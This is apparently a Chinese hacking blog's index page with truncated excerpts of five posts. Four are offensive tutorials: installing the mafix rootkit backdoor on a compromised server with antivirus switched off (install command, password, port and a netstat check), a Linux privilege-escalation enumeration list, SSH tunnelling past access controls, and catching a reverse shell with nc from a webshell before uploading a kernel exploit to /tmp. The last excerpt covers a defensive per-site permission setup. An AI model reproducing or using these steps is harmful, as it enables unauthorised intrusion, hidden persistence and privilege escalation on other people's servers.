摘要： 1.首先是获得远程服务器的root权限2.然后下载rootkit程序，本文用到的是mafix(下载前最好把杀毒软件关掉，基本上会报毒的！)3.开始安装tar -xvzf mafix.tar.gzcd mafix./root rootkit345 (其中rootkit为你连接后门程序时的密码，345为连接的端口)可以验证一下是否成功：[root@localhost ~]# netstat -anlp|grep 345tcp 0 0 0.0.0.0:345 0.0.0.0:* LISTEN 11280/ttyload可以看到，345端口已经在监听了。4.连接后门程序ssh 192.168.211. 阅读全文

摘要： 文中的每行为一条命令，文中有的命令可能在你的主机上敲不出来，因为它可能是在其他版本的linux中所使用的命令。列举关键点（Linux）的提权是怎么一回事：收集–枚举，枚举和一些更多的枚举。过程–通过数据排序，分析和确定优先次序。搜索–知道搜索什么和在哪里可以找到漏洞代码。适应–自定义的漏洞，所以它适合。每个系统的工作并不是每一个漏洞“都固定不变”。尝试–做好准备,试验和错误。操作类型操作类型是什么版本?cat/etc/issuecat/etc/*-releasecat/etc/lsb-releasecat/etc/redhat-release它的内核版本是什么？cat/proc/version 阅读全文

摘要： 在渗透测试过程中，经常遇到如下情形，内部网络主机通过路由器或者安全设备做了访问控制，无法通过互联网直接访问本地开放的服务，Windows方 面，国内通常选择Lcx.exe来进行端口转发，在应用方面大多数人也会选择reDuh来进行端口转发，而linux却很少人用系统自带的ssh、iptables自身来处理此类问题。由于时间有限，本文只详细的介绍ssh tunnel方面的知识,iptables的有空再加上。SSH的三个端口转发命令：ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Hostssh -C -f -N -g -R 阅读全文

摘要： 很多时候linux拿到shell了,然后在菜刀或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!先看下linux内核2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统!找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666然后再点你shell连接成功就出现下面的内容然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通过Webshell把EXP上传到/tmp目录下,为什么要传到这个目录呢?因为在Linux下一般tmp目录的权限 阅读全文

摘要： 如果我们为每个站点都建立一个用户，并设置该用户只有访问本站点的权限，那么就能将访问权限控制在每个站点文件夹内，旁注问题也就解决了一、这样配置的好处？不知大家有没有听过旁注？我简单的解释一下吧：有个人想黑掉A站点，但找来找去都没发现可利用的漏洞，无意中他发现与A同服务器上还有个B站点，并且在B站点上找到了可利用的漏洞，于是他将木马从B站中上传至服务器，如果服务器权限配置不当，那么现在他就可以黑掉服务器上的所有站点了！如果我们为每个站点都建立一个用户，并设置该用户只有访问本站点的权限，那么就能将访问权限控制在每个站点文件夹内，旁注问题也就解决了。二、准备工作1、运行环境：Win2K 服务器版 + 阅读全文